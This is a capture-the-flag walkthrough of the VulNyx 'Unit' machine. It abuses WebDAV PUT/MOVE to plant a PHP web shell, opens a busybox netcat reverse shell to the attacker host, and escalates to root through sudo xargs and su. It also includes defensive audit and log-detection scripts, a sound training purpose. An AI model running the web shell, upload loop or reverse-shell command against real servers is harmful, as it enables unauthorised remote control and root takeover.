🟢 NYX - Unit
#vulnyx
#nyx
#linux
#http methods
#put
#move
#xargs (sudo)
#su (sudo)
December 8, 2023 by Miguel R. (d4t4s3c)
Information
Unit is a Linux machine on the VulNyx platform. It is rated easy and was created by the user d4t4s3c.
- Initial access: Through misconfigurations in the web server backend, I upload a file containing PHP code by abusing HTTP methods (PUT/MOVE) and obtain a shell.
- Privilege escalation: The user has sudo permissions on a binary that allows becoming root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 10:39 CET
Nmap scan report for 192.168.1.74
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 10:40 CET
Nmap scan report for 192.168.1.74
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 415 Unsupported Media Type
8080/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 415 Unsupported Media Type
| http-methods:
|_ Potentially risky methods: PUT MOVE
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.74/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74:8080/ -b 415
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.74:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 415
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
In the initial nmap scan, the http-methods NSE script shows that some HTTP methods considered critical are enabled: the PUT method allows uploading files and the MOVE method allows renaming them, which can lead to a bypass of the extension blacklist defined in the backend.
| http-methods:
|_ Potentially risky methods: PUT MOVE
I verify this again with cURL as well
❯ curl -vX OPTIONS "http://192.168.1.74:8080"
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> OPTIONS / HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:29:40 GMT
< Content-Type: application/octet-stream
< Content-Length: 0
< Connection: keep-alive
< Allow: OPTIONS, PUT, MOVE
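A defender-side counterpart to the checks above, added here as an example and not part of the original writeup or of the VulNyx machine: a small shell audit that reads an nginx configuration and flags locations where ngx_http_dav_module write methods are exposed. The configuration in SAMPLE_CONF is constructed (the box's real config is not shown on the page, and the extension filter that answered 415 is not reproduced); the function name audit_nginx_conf is my own.

```shell
#!/bin/sh
# Added example, not the machine's configuration: audit an nginx config for
# WebDAV write methods (ngx_http_dav_module) exposed without access control.
# SAMPLE_CONF is constructed: the first server reproduces what this box
# exposes (PUT and MOVE open to everyone), the second still allows
# unrestricted PUT, the third is the hardened version.

SAMPLE_CONF='
server {
    listen 8080;
    root /var/www/uploads;
    location / {
        dav_methods PUT MOVE;
        create_full_put_path on;
    }
}
server {
    listen 8081;
    root /var/www/uploads;
    location / {
        dav_methods PUT;
    }
}
server {
    listen 8082;
    root /var/www/uploads;
    location /incoming/ {
        dav_methods PUT;
        allow 10.10.0.0/24;
        deny all;
    }
}
'

# audit_nginx_conf: reads an nginx config on stdin, prints one line per
# location that enables MOVE, or PUT without an allow/deny or auth directive,
# and returns the number of flagged locations (0 means nothing to report).
# Only locations written in the file itself are seen; include files are not followed.
audit_nginx_conf() {
    awk '
        /^[ \t]*#/ { next }                                  # skip comments
        /^[ \t]*location[ \t]/ {
            inloc = 1; methods = ""; restricted = 0
            loc = ($2 ~ /^[=~^]/) ? $3 : $2                  # skip a modifier such as = or ~
            next
        }
        inloc && /dav_methods/ {
            methods = $0
            sub(/.*dav_methods[ \t]*/, "", methods)
            sub(/;.*/, "", methods)
        }
        inloc && /^[ \t]*(allow|deny|auth_basic|auth_request)[ \t]/ { restricted = 1 }
        inloc && /}/ {
            inloc = 0
            if (methods ~ /MOVE/) {
                print "RISKY  location " loc ": MOVE enabled (" methods ") - uploaded files can be renamed to any extension"
                n++
            } else if (methods ~ /PUT/ && !restricted) {
                print "RISKY  location " loc ": PUT enabled without allow/deny or authentication"
                n++
            }
        }
        END { exit n }
    '
}

printf '%s\n' "$SAMPLE_CONF" | audit_nginx_conf || echo "[-] $? location(s) need attention"
```

Against a real host you would run `audit_nginx_conf < /etc/nginx/nginx.conf` (and the files under conf.d or sites-enabled one by one). The point of the hardened block is that a renamed upload is only dangerous where MOVE is allowed, and an upload is only dangerous where anyone can PUT; removing MOVE and fencing PUT behind allow/deny or authentication removes both halves of the chain used on this box.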
PUT
I try to upload a PHP file with PUT, without success; it returns a 404 Not Found status code
❯ cat cmd.php ;echo
<?php system($_GET['cmd']); ?>
❯ curl -vX PUT "http://192.168.1.74:8080/cmd.php" -d @cmd.php
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> PUT /cmd.php HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 30
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 30 bytes
< HTTP/1.1 404 Not Found
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:35:50 GMT
< Content-Type: text/html
< Content-Length: 153
< Connection: keep-alive
<
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
Extensions Brute Force
I create a bash script with an array of possible extensions; it sends the request once per extension and keeps the response code, to find out which extensions the backend accepts.
#!/bin/bash
# Candidate extensions to try with PUT
array=(".php" ".php5" ".phtml" ".jpg" ".jpeg" ".gif" ".rar" ".zip" ".html" ".txt")
echo
for ext in "${array[@]}"; do
    # Upload cmd.php under each extension and keep only the HTTP status code
    code=$(curl -o /dev/null -w "%{http_code}" -sX PUT "http://192.168.1.74:8080/cmd$ext" -d @cmd.php)
    echo "[*] Code: $code Extension: $ext"
done
I manage to upload a file with a .txt extension containing PHP code
❯ ./extensions_bruteforce.sh
[*] Code: 404 Extension: .php
[*] Code: 415 Extension: .php5
[*] Code: 415 Extension: .phtml
[*] Code: 415 Extension: .jpg
[*] Code: 415 Extension: .jpeg
[*] Code: 415 Extension: .gif
[*] Code: 415 Extension: .rar
[*] Code: 415 Extension: .zip
[*] Code: 415 Extension: .html
[*] Code: 204 Extension: .txt
MOVE
Now with the MOVE method I rename the file, changing the extension from .txt to .php
❯ curl -vX MOVE -H "Destination: http://192.168.1.74:8080/cmd.php" "http://192.168.1.74:8080/cmd.txt"
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> MOVE /cmd.txt HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
> Destination: http://192.168.1.74:8080/cmd.php
>
* Request completely sent off
< HTTP/1.1 204 No Content
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:49:11 GMT
< Connection: keep-alive
Reverse Shell
I manage to execute commands as the www-data user
❯ curl -sX GET "http://192.168.1.74:8080/cmd.php?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now that I can execute commands, I try to obtain a reverse shell
❯ curl -sX GET "http://192.168.1.74:8080/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
I get the shell as the www-data user
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.74] 53734
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
unit
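From the detection side, here is an added example (not from the original post) that runs the logic a SOC would want over nginx access logs for the PUT, MOVE and GET sequence shown in this section: every PUT/MOVE is listed, and a client that does a successful PUT, then a successful MOVE, then requests a script extension is reported as a chain. The lines in SAMPLE_LOG are constructed to mirror the requests above; the function name detect_dav_chain and the default "combined" log format are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): detection logic for the
# upload -> rename -> execute sequence over nginx access log lines in the
# default "combined" format. SAMPLE_LOG is constructed; the first three lines
# mirror the requests made in this writeup, the last two are benign noise.

SAMPLE_LOG='192.168.1.10 - - [02/Mar/2025:10:45:01 +0000] "PUT /cmd.txt HTTP/1.1" 204 0 "-" "curl/8.12.1"
192.168.1.10 - - [02/Mar/2025:10:49:11 +0000] "MOVE /cmd.txt HTTP/1.1" 204 0 "-" "curl/8.12.1"
192.168.1.10 - - [02/Mar/2025:10:50:02 +0000] "GET /cmd.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.12.1"
10.0.0.5 - - [02/Mar/2025:10:51:00 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Mar/2025:10:51:05 +0000] "PUT /notes.txt HTTP/1.1" 204 0 "-" "curl/8.12.1"'

# detect_dav_chain: reads access log lines on stdin. Prints a WRITE line for
# every PUT/MOVE request (worth reviewing on their own) and a CHAIN line when
# one client does a successful PUT, then a successful MOVE, then requests a
# script extension. Returns the number of CHAIN alerts as the exit status.
detect_dav_chain() {
    awk '
        {
            ip = $1
            method = $6; sub(/^"/, "", method)         # field 6 is the quoted method, strip the opening quote
            path = $7
            status = $9
            clean = path; sub(/\?.*/, "", clean)       # drop the query string for the extension check

            if (method == "PUT" || method == "MOVE")
                print "WRITE  " ip " " method " " path " -> " status

            if (method == "PUT" && status ~ /^2/)
                stage[ip] = 1
            else if (method == "MOVE" && status ~ /^2/ && stage[ip] >= 1)
                stage[ip] = 2
            else if (stage[ip] == 2 && clean ~ /\.(php[0-9]?|phtml|phar)$/) {
                print "CHAIN  " ip " uploaded a file, renamed it and then requested " path
                chains++
                stage[ip] = 0
            }
        }
        END { exit chains }
    '
}

printf '%s\n' "$SAMPLE_LOG" | detect_dav_chain || echo "[-] $? upload/rename/execute chain(s) detected"
```

On a live box this would be `detect_dav_chain < /var/log/nginx/access.log`. The MOVE destination is not in the access log, which is why the rule keys on the follow-up request to a script extension rather than on the rename target; any PUT/MOVE at all on a server that is not meant to accept uploads is already worth an alert on its own.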
Shell (jones)
The www-data user can run the xargs binary as jones with sudo
www-data@unit:/$ sudo -l
Matching Defaults entries for www-data on unit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on unit:
(jones) NOPASSWD: /usr/bin/xargs
GTFOBins gives us the one-liner with the shell escape sequence, and I become the jones user
www-data@unit:/$ sudo -u jones /usr/bin/xargs -a /dev/null sh
$ bash -i
jones@unit:/$ id ; hostname
uid=1000(jones) gid=1000(jones) groups=1000(jones)
unit
Privilege Escalation
The jones user can run the su binary as root with sudo
jones@unit:/$ sudo -l
Matching Defaults entries for jones on unit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User jones may run the following commands on unit:
(root) NOPASSWD: /usr/bin/su
I become the root user by abusing this privilege
jones@unit:/$ sudo su
root@unit:/# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
unit
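Both sudo rules on this box (www-data to jones via xargs, jones to root via su) are what a least-privilege review should catch before anyone else does. The following shell audit is an added example, not part of the original writeup: it parses sudoers text and flags non-root rules that grant ALL, or a binary known to hand out a shell. SAMPLE_SUDOERS is constructed; the list of shell-capable binaries is deliberately short, seeded from the two on this page plus the common shells, and is not the full GTFOBins set; audit_sudoers is my own name.

```shell
#!/bin/sh
# Added example (not from the original post): a least-privilege audit of
# sudoers rules. SAMPLE_SUDOERS is constructed; the two NOPASSWD rules
# reproduce the ones found on this box, the others are there to show what
# does and does not get flagged.

SAMPLE_SUDOERS='Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(jones) NOPASSWD: /usr/bin/xargs
jones    ALL=(root) NOPASSWD: /usr/bin/su
admin    ALL=(ALL:ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
deploy   ALL=(root) /usr/bin/systemctl restart app.service'

# audit_sudoers: reads sudoers content on stdin and prints one RISKY line for
# each non-root rule that grants ALL, or a binary that can hand out a shell
# (the two from this box plus the common shells). Returns the number of
# flagged rules as the exit status.
audit_sudoers() {
    awk '
        BEGIN { split("sh bash dash zsh ksh su xargs", list, " "); for (i in list) shellcap[list[i]] = 1 }
        /^[ \t]*#/ { next }                     # comments
        /^[ \t]*$/ { next }                     # blank lines
        /^[ \t]*Defaults/ { next }              # option lines, not grants
        {
            line = $0
            eq = index(line, "=")
            if (eq == 0) next
            lhs = substr(line, 1, eq - 1); sub(/^[ \t]+/, "", lhs)
            user = lhs; sub(/[ \t].*/, "", user)
            if (user == "root") next
            rhs = substr(line, eq + 1)
            runas = "ALL"
            if (match(rhs, /\([^)]*\)/)) {      # optional (runas_user:runas_group)
                runas = substr(rhs, RSTART + 1, RLENGTH - 2)
                rhs = substr(rhs, RSTART + RLENGTH)
            }
            tag = (rhs ~ /NOPASSWD:/) ? " (NOPASSWD)" : ""
            gsub(/[A-Z]+:/, "", rhs)            # strip tags such as NOPASSWD: or SETENV:
            sub(/^[ \t]+/, "", rhs)
            cmd = rhs; sub(/[ \t].*/, "", cmd)  # first token is the command path
            base = cmd; sub(/.*\//, "", base)   # basename for the lookup
            if (cmd == "ALL") {
                print "RISKY  " user " may run ANY command as " runas tag
                n++
            } else if (base in shellcap) {
                print "RISKY  " user " may run " cmd " as " runas tag " - this binary can spawn a shell"
                n++
            }
        }
        END { exit n }
    '
}

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers || echo "[-] $? rule(s) need attention"
```

Run it as `cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers` on a host you administer. The fix for a hit is to grant the one command the user actually needs with its full argument list, as the rsync and systemctl rules do, rather than a wrapper like xargs or a privilege switch like su; any entry that lets a service account such as www-data reach another user should be questioned outright.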
Flags
Now as the root user I can read the user.txt and root.txt flags
root@unit:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
0d65e8**************************
956f45**************************
That concludes the walkthrough of the Unit machine.
Happy Hacking!
